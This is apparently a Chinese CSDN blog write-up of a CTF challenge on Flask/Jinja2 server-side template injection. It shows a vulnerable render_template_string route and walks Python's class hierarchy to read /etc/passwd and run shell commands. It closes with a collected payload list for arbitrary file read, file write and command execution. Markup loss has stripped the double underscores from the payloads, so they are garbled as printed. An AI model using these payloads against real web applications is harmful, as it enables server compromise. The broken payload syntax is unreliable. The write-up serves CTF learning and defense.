web_进阶_Web_python_template_injection

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量355 收藏
点赞数
分类专栏: ctf-web刷题之旅
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JURUO222/article/details/107858393
版权

参考文章

flask模板注入

flask的渲染方法有render_template和render_template_string两种。

  • render_template()是用来渲染一个指定的文件的。使用如下
    return render_template(‘index.html’)
  • render_template_string则是用来渲染一个字符串的。SSTI与这个方法密不可分。
    使用方法如下
    html = ‘

    This is index page


    return render_template_string(html)

模板文件并不是单纯的html代码,而是夹杂着模板的语法,因为页面不可能都是一个样子的,有一些地方是会变化的。比如说显示用户名的地方,这个时候就需要使用模板支持的语法,来传参。

例子

from flask import Flask,url_for,redirect,render_template,render_template_string
@app.route('/index/')
def user_login():
    return render_template('index.html',content='This is index page.')

/templates/index.html

<h1>{{content}}</h1>
注入

存在漏洞的代码

@app.route('/test/')
def test():
    code = request.args.get('id')
    html = '''
        <h3>%s</h3>
    '''%(code)
    return render_template_string(html)
  • 这段代码存在漏洞的原因是数据和代码的混淆。代码中的code是用户可控的,会和html拼接后直接带入渲染。
  • 模板引擎一般都默认对渲染的变量值进行编码转义,这样就不会存在xss了。在这段代码中用户所控的是code变量,而不是模板内容。存在漏洞的代码中,模板内容直接受用户控制的。
知识补充
  • 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。
  • 通过python的对象的继承来一步步实现文件读取和命令执行的,找到父类<type ‘object’>–>寻找子类–>找关于命令执行或者文件操作的模块。
    1 、获取字符串的类对象

‘’.class
<type ‘str’>

2 、寻找基类

‘’.class.mro
(<type ‘str’>, <type ‘basestring’>, <type ‘object’>)

3 、寻找可用引用,可以看到有一个<type 'file'>

‘a’.class.mro[2].subclasses()
4 、利用之读取到了文件内容
‘’.class.mro[2].subclasses()[40] (’/etc/passwd’).read()
#分析这道题

  1. 测试是否存在flask漏洞
    6*6被计算了,说明可以flask漏洞


2.’’.class.mro[2].subclasses()[71].init.globals[‘os’].system(‘ls’)

3. {{’’.class.mro[2].subclasses()40.read()}}

常见payload收集

//获取基本类
‘’.class.mro[1]
{}.class.bases[0]
().class.bases[0]
[].class.bases[0]
object
//读文件
().class.bases[0].subclasses()[40] (r’C:\1.php’).read()
object.subclasses()[40] (r’C:\1.php’).read()
//写文件
().class.bases[0].subclasses()[40] (’/var/www/html/input’, ‘w’).write(‘123’)
object.subclasses()[40] (’/var/www/html/input’, ‘w’).write(‘123’)
//执行任意命令
().class.bases[0].subclasses()[59].init.func_globals.values()[13][‘eval’](‘import(“os”).popen(“ls /var/www/html”).read()’ )
object.subclasses()[59].init.func_globals.values()[13][‘eval’](‘import(“os”).popen(“ls /var/www/html”).read()’ )

Diana_1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web_Front.zip_django_python mysql
09-19
【标题】"Web_Front.zip_django_python mysql" 指的是一个使用Python的Django框架构建的,基于MySQL数据库的简单网站示例。这个压缩包文件包含了开发这样一个Web前端所需的所有资源。 【描述】"a simple website ...
Web_python_template_injection(Python模块注入)
Welcome To Myon'Blog !
04-11 1369
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
攻防世界webWeb_python_template_injection详解
hxhxhxhxx的博客
07-28 1642
攻防世界webWeb_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以行模板注入 这个题目和另外一个有点区别,tplmap并不能行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
攻防世界--WEB--Web_python_template_injection
m0_46267075的博客
05-28 1143
好难啊
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2313
攻防世界,python模板注入
【攻防世界】Web_python_template_injection
最新发布
2302_79800344的博客
04-01 919
【代码】【攻防世界】Web_python_template_injection。
Python语言_python_python_
10-03
在Python编程语言的世界里,""意味着深入学习其高级特性和技术,以便更好地解决复杂问题和构建高效代码。本篇文章将详细探讨Python语法及相关知识,旨在帮助已经掌握了Python基础知识的学习者一步提升技能...
cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py
09-21
标题中的“cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py”暗示了这是一个关于使用Python的Selenium WebDriver库来操作Web页面的教程或代码示例。描述中的“python webdriver登录web页面”...
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
webdriver_pythonweb_python_WEBDRIVERPYTHON_
10-03
运用python中的webdriver库学习自动化,示例为中国大学慕课MOOC+百度+CSDN自动登录程序。
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 707
Web_python_template_injection(攻防世界) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
web python template injection_攻防世界-Web_python_template_injection详解
weixin_39989668的博客
12-10 423
Web_python_template_injection在做这道题之前如果大家不懂可以先看一看这篇文章:从零学习flask模板注入基础知识:在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。1.判断有无模板注入payloadhttp://220.249.52.133:53362/{{7+7}}查看全局变量http://220.249.5...
【愚公系列】2023年05月 攻防世界-Web(Web_python_template_injection)
热门推荐
时光隧道
04-30 1万+
SSTI即(server-side template injection)服务器模板,平时我们常用的有sql注入,xss注入,xml注入和命令注入等等。大家应该都知道sql注入的原理以及方式,而模板注入的原理也很类似都是通过输入一些指令在后端处理行了语句的拼接然后执行。模板注入不同的是它是针对python、php、java、nodejs、javascript或是ruby的网站处理框架。
Web安全(Web_python_template_injection)
m0_56010012的博客
03-01 1598
可以知道题目是template injection题目。 由此可知,说明存在“SSTI”。关于SSTI即服务端模板注入攻击,服务端接受用户输入,将其作为 Web 应用模板的一部分,渲染编译后执行了恶意内容,导致敏感信息泄露、代码执行等。 常规的魔术方法,如下。可以在博客CTF 中常见 Python 题型 SSTI - 网安有其他问题的介绍。 __class__ #返回type类型,查看对象的类型 __bases__ #返回tuple类型,列出该类的基类 __mro__ #返回tuple...
XCTF-攻防世界CTF平台-Web类——12、Web_python_template_injection(SSTI服务器模板注入、Flask框架之Jinja2模板渲染引擎)
Onlyone_1314的博客
11-26 1346
目录标题模板引擎SSTI服务器模板注入python模板注入Flask应用框架Jinja2模板渲染引擎Python中常用于ssti的魔术方法获取基类的一些方法获取基本类的子类四种方法读取flag(1)site._Printer类调用os.popen函数执行任意命令(2)site._Printer类调用os.listdir函数执行查看本级目录下的文件(3)catch_warnings类的linecache函数执行任意命令(4)遍历基类找函数执行__import __("os").popen("ls").read
【网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 5331
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
攻防世界之Web_python_template_injection (web
my_name_is_sy的博客
06-29 1974
考点为模板漏洞及其利用。
WEB:Web_python_template_injection
sleepywin的博客
07-29 235
可以看到当前目录下有个fl4g,执行cat fl4g。打开题目,发现页面提示,翻译为python模板注入。利用site.Printer的os模块执行命令。python模板注入。
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6898
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
web_python_template_injection
03-16
Web Python 模板注入是一种在Web应用程序中使用Python模板引擎时可能存在的安全漏洞。通过将恶意代码注入到模板中,攻击者可能能够执行任意代码,访问敏感信息,或者控制应用程序。应该通过验证用户输入并使用严格的输入限制来防止模板注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值